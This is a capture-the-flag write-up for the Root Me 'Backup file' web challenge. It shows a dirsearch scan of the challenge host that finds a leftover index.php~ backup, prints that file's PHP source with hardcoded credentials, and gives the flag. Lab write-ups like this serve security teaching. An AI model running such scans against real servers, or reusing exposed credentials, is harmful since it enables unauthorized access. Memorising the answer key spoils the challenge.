Backup file
- Points: 15
- Link: https://www.root-me.org/en/Challenges/Web-Server/Backup-file
Statement
No clue.
Solution
1
dirsearch -u http://challenge01.root-me.org/web-serveur/ch11/
1
2
200 - 531B - /web-serveur/ch11/index.php
200 - 843B - /web-serveur/ch11/index.php~
Check both of them, we have
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
$username="ch11";
$password="OCCY9AcNm1tj";
echo '
<html>
<body>
<h1>Authentication v 0.00</h1>
';
if ($_POST["username"]!="" && $_POST["password"]!=""){
if ($_POST["username"]==$user && $_POST["password"]==$password)
{
print("<h2>Welcome back {$row['username']} !</h2>");
print("<h3>Your informations :</h3><p>- username : $row[username]</p><br />");
print("To validate the challenge use this password</b>");
} else {
print("<h3>Error : no such user/password</h2><br />");
}
}
echo '
<form action="" method="post">
Login <br/>
<input type="text" name="username" /><br/><br/>
Password <br/>
<input type="password" name="password" /><br/><br/>
<br/><br/>
<input type="submit" value="connect" /><br/><br/>
</form>
</body>
</html>
';
?>
The flag is
1
OCCY9AcNm1tj
This post is licensed under CC BY 4.0 by the author.